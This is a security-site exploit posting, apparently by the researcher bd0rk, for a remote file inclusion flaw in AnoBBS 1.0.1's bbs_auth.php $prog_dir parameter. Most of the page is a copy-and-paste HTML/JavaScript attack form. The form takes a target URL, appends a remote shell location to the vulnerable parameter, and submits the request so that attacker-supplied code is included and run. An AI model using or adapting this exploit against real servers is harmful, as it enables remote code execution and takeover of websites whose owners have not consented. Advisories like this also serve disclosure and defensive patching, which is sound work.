AnoBBS 1.0.1 Remote File Inclusion Exploit

2016.09.16
Credit: bd0rk
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!-- # Title: AnoBBS 1.0.1 Remote File Inclusion Exploit # Author: bd0rk || Germany # Tested on: Ubuntu-Linux # Twitter: twitter.com/bd0rk # Greetz: Vadim, x0r_32, rgod, zone-h.org, Michael RaumklanG #Vendor-URL: http://www.iterapi.com/index.php?cat=78&art=788 #Download-Link: http://www.hotscripts.com/listings/jump/download/90434 #The $prog_dir-parameter in /anobbs_dev_1.0.1/progs/bbs_auth.php line 7 is vulnerable. >>>Exploitcode for Copy&Paste<<< --> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>AnoBBS 1.0.1 Remote File Inclusion Exploit</title> <script language="JavaScript"> var dir="/progs/" var file="/bbs_auth.php?" var parameter ="prog_dir=" var shell="Insert your shellcode here" function command() { if (document.rfi.target1.value==""){ alert("Exploit failed..."); return false; } rfi.action= document.rfi.target1.value+dir+file+parameter+shell; rfi.submit(); } </script> </head> <body bgcolor="#000000"> <center> <p><b><font face="Verdana" size="2" color="#008000">AnoBBS 1.0.1 Remote File Inclusion Exploit</font></b></p> <p></p> <form method="post" target="getting" name="rfi" onSubmit="command();"> <b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial"> </font><font color="#FF0000" size="2">&nbps;</font></b> <input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p> <p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p> </form> <p><br> <iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe> </p> <b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p> </center> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top